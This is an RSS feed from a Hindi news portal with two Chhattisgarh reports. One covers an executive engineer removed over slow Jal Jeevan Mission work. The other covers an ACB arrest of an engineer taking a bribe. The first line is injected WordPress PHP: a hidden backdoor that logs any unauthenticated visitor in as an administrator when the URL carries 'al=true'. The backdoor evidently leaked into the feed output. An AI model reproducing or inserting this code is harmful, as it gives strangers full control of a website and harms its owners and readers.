// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); engineer – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Fri, 28 Jun 2024 20:55:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 छत्तीसगढ़-बलरामपुर में जल जीवन मिशन के कार्यों में उदासीनता, प्रभारी कार्यपालन अभियंता निलंबित https://pratyushaashakinayikiran.com/?p=46141 Fri, 28 Jun 2024 20:55:00 +0000 https://pratyushaashakinayikiran.com/?p=46141 बलरामपुर.

छत्तीसगढ़ लोक स्वास्थ्य यांत्रिकी विभाग ने जल जीवन मिशन के कार्यों में संतोषजनक प्रगति नहीं पाए जाने पर बलरामपुर खंड के प्रभारी कार्यपालन अभियंता को हटा दिया है। विभागीय समीक्षा बैठक में बलरामपुर जिले में जल जीवन मिशन के कार्यों में वांछित प्रगति नहीं होने और लक्षित कार्यों को समय-सीमा में पूर्ण करने में कठिनाई पाए जाने पर विभाग ने वहां के प्रभारी कार्यपालन अभियंता आदित्य प्रताप को तत्काल प्रभाव से हटा दिया है।

लोक स्वास्थ्य यांत्रिकी विभाग के प्रमुख अभियंता द्वारा इस संबंध में आदेश जारी किया गया है। प्रमुख अभियंता ने जारी आदेश में कहा कि विगत 20 जून को हुई राज्य स्तरीय समीक्षा बैठक में यह परिलक्षित हुआ है कि बलरामपुर जिले में जल जीवन मिशन का कार्य संतोषजनक नहीं है। इससे स्पष्ट होता है कि बलरामपुर खंड के प्रभारी कार्यपालन अभियंता द्वारा अपने दायित्वों एवं कर्तव्यों के निर्वहन में उदासीनता बरतने के कारण विभागीय कार्य प्रभावित हो रहे हैं। जल जीवन मिशन के लक्षित कार्यों को समय-सीमा में पूर्ण करने के लिए वांछित गति नहीं दिए जाने से बलरामपुर जिले में मिशन के उद्देश्यों के अनुरूप वांछित प्रगति प्राप्त करने में कठिनाई आ रही है।
लोक स्वास्थ्य यांत्रिकी विभाग के बलरामपुर खंड के प्रभारी कार्यपालन अभियंता आदित्य प्रताप को आगामी आदेश तक बिलासपुर परिक्षेत्र के मुख्य अभियंता कार्यालय में कार्य करने के निर्देश दिए गए हैं। उनके स्थान पर लोक स्वास्थ्य यांत्रिकी मंडल अंबिकापुर के अधीक्षण अभियंता कार्यालय में सहायक अभियंता सुशील कुमार सिन्हा को बलरामपुर खंड के कार्यपालन अभियंता का प्रभार सौंपा गया है।

]]>
कोंडागांव में कार्यपालन अभियंता के बंगले में ACB ने मारा छापा, पचास हजार रिश्वत लेते हुए रंगे हाथ गिरफ्तार https://pratyushaashakinayikiran.com/?p=31894 Sat, 18 May 2024 17:26:00 +0000 https://pratyushaashakinayikiran.com/?p=31894 जगदलपुर/कोंडागांव.

कोंडागांव में एंटी करप्शन ब्यूरो जगदलपुर ने छापेमार कार्रवाई करते हुए जल संसाधन विभाग के कार्यपालन अभियंता टी आर मेश्राम को पचास हजार रिश्वत लेते हुए रंगे हाथों गिरफ्तार किया है। जल संसाधन विभाग का यह कोई पहला मामला नहीं है इससे पहले का मामला अभी न्यायालय में लंबित है जिसमें तत्कालीन कार्यपालन अभियंता आर बी सिंह को एंटी करप्शन ब्यूरो की टीम ने रिश्वत लेते हुए रंगे हाथों गिरफ्तार कर जेल भेजा था।

पूर्व के मामले का निपटारा अभी हुआ ही नहीं था कि तत्कालीन कार्यपालन अभियंता आर बी सिंह की जगह आए हुए कार्यपालन अभियंता टी आर मेश्राम को आज एंटी करप्शन ब्यूरो जगदलपुर की टीम ने 50 हजार रुपये रिश्वत लेते हुए रंगे हाथों गिरफ्तार किया है। जल संसाधन विभाग का यह कोई पहला मामला नहीं है इससे पहले का मामला अभी न्यायालय में लंबित है. जिसमें तत्कालीन कार्यपालन अभियंता आर बी सिंह को एंटी करप्शन ब्यूरो की टीम ने रिश्वत लेते हुए रंगे हाथों गिरफ्तार कर जेल भेजा था।

क्या था मामला
पुलिस से मिली जानकारी अनुसार तुषार देवांगन द्वारा जल संसाधन विभाग में स्टॉप डैम का कार्य किया जा रहा था जिसके एक्सटेंशन व चेक जारी करने के लिए कार्यपालन अभियंता जल संसाधन कोंडागांव टी आर मेश्राम द्वारा 7लाख की मांग की गई थी।  प्रार्थी तुषार देवांगन द्वारा रिश्वत की पहली किश्त के रूप में 50 हजार टी आर मेश्राम को देने के लिए उनके सरकारी निवास पर पहुंचा जहां एसीबी जगदलपुर की टीम ने पहुंचकर कार्यपालन अभियंता जल संसाधन कोंडागांव को 50 हजार के साथ रंगे हाथों गिरफ्तार कर न्यायालय में पेश कर जेल भेज दिया।

]]>